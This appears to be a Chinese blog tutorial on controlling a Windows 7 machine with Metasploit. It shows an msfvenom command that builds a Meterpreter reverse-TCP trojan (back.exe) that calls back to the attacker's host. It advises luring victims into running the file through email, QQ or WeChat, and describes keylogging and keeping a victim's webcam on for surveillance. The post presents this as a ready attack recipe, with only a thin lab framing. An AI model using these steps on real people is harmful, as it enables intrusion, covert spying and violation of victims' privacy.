利用msf生成木马控制win7

第一步:扫描win系统有哪些开放端口

发现目标主机 192.168.10.130 上的三个TCP端口处于开放状态:

  • 135/tcp:运行 Microsoft RPC 服务
  • 139/tcp:运行 NetBIOS-SSN 服务
  • 445/tcp:运行 Microsoft-DS (Directory Services) 服务

第二步:生成木马

在Kali Linux中使用Metasploit的msfvenom工具生成一个Windows平台的Meterpreter反向TCP shell载荷

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=攻击机IP lport=自己设定不被占用端口号 -f 生成文件类型 -o 输出保存位置

表实验后续 参数解释

参数

含义

-p windows/meterpreter/reverse_tcp

指定要生成的Payload类型为Windows平台的Meterpreter反向TCP shell。以便与Kali Linux上的攻击者建立反向TCP连接

lhost=192.168.0.103

设置要连接回的IP地址,即指定Meterpreter shell将连接的IP地址

lport=4444

设置连接的端口号,即指定Meterpreter shell将使用的本地端口

-f exe

指定生成的文件格式为可执行文件(exe)

-o back.exe

指定输出文件的名称为back.exe

第三步:传播木马

通过邮件、QQ、微信发送给对方,诱听对方运行木马。

在把back.exe拖拽到受害者的主机上(win7如果不能粘贴外来文件,就把虚拟机中的VMware Tools打开安装就行)

就可以实现外来文件的粘贴复制了

第四步:接下来我们打开监听功能

第五步:使用meterpreter继续后渗透

Ps进程获取

1)对键盘输入(记事本)进行监控

2)控制对方摄像头

实施监控,一直打开摄像头

  • 5
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小野猪都有白菜拱

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值